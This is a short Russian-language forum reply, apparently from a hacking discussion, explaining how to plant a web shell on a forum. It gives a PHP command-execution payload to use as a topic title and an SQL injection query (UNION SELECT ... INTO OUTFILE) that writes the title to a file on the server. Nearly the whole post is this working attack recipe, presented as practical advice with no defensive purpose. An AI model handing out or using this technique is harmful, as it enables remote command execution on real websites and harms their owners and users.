Запросы wget здесь нипричем =)

действия примерно такие(на примере форума):
создаешь топик с именем <?php passthru($_GET[cmd]) ?> и
потом через sql-иньекцию выполняешь запрос опять же что-то типа -1 UNION SELECT topic_name, null, null FROM bb_topics INTO OUTFILE абсолютный_путь_к_шеллу WHERE topic_id = номер_топика